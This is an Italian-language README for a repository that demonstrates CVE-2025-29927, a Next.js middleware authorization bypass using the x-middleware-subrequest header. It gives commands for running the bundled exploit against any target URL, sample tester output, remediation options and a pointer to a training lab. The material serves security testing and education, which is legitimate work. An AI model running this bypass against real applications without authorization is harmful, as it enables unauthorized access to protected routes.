
Questo repository contiene una proof of concept (POC) e uno script di exploit per CVE-2025-29927, una vulnerabilità critica in Next.js che consente agli attaccanti di bypassare i controlli di autorizzazione implementati nel middleware.
Questo repository contiene un proof of concept (POC) per CVE-2025-29927, una vulnerabilità critica in Next.js che consente agli attaccanti di bypassare i controlli di autorizzazione implementati nel middleware.
Questa applicazione Next.js dimostra la vulnerabilità con una route dashboard protetta.
npm install
npm run build
npm run start
Lo script di exploit può testare qualsiasi applicazione Next.js per questa vulnerabilità.
npm run exploit <target-url>
npm run exploit http://localhost:3000/dashboard
Lo strumento di exploit:
x-middleware-subrequest=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass header
Un'implementazione della correzione è disponibile nel ramo how-to-fix.
Aggiorna la versione di Next.js (Consigliato)
Implementa una validazione secondaria
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /
Next.js utilizza un header interno x-middleware-subrequest per prevenire richieste ricorsive. Questa vulnerabilità consente agli attaccanti di bypassare i controlli di sicurezza del middleware manipolando questo header.
Vuoi andare oltre? Questa CVE è implementata come flag in OSS OopsSec Store, un laboratorio deliberatamente vulnerabile progettato per la formazione sulla sicurezza offensiva.
👉 Prova la sfida qui → kOaDT/oss-oopssec-store
Questo strumento è fornito solo a scopo educativo e di test. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.